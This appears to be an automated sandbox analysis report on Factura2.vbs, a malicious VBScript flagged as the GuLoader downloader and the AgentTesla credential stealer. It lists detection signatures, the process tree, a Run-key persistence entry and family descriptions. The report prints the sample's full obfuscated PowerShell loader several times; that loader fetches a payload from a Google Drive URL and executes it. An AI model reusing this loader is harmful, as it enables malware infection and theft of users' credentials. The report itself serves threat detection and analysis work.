Windows Analysis Report
Factura2.vbs

Overview

General Information

Sample name: Factura2.vbs
Analysis ID: 1427893
MD5: 9500105068ac091471491a1a7c9065c2
SHA1: f92e6b13cd0ae67dccebdcbbcdc5634a1c66aae8
SHA256: ebfb38c8313f04d9afc3223ef7d30908d98880d333bff470da280d472b3cc836
Tags: vbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. 
B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. 
Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout 
');Saprophagan $Superincumbent163;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2536 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6136 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. 
B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. 
Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout 
');Saprophagan $Superincumbent163;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5700 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7068 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • newfile.exe (PID: 6368 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3532 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • newfile.exe (PID: 6316 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Source | Rule | Description | Author | Strings
amsi32_6136.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
            • 0xe06b:$b2: ::FromBase64String(
            • 0xd146:$s1: -join
            • 0x68f2:$s4: +=
            • 0x69b4:$s4: +=
            • 0xabdb:$s4: +=
            • 0xccf8:$s4: +=
            • 0xcfe2:$s4: +=
            • 0xd128:$s4: +=
            • 0x16a40:$s4: +=
            • 0x16ac0:$s4: +=
            • 0x16b86:$s4: +=
            • 0x16c06:$s4: +=
            • 0x16ddc:$s4: +=
            • 0x16e60:$s4: +=
            • 0xd914:$e4: Get-WmiObject
            • 0xdb03:$e4: Get-Process
            • 0xdb5b:$e4: Start-Process
            • 0x1556c:$e4: Get-Process

            System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", ProcessId: 6268, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\newfile\newfile.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newfile
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", ProcessId: 6268, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKro
            No Snort rule has matched

            AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: Factura2.vbs | Virustotal: Detection: 16%
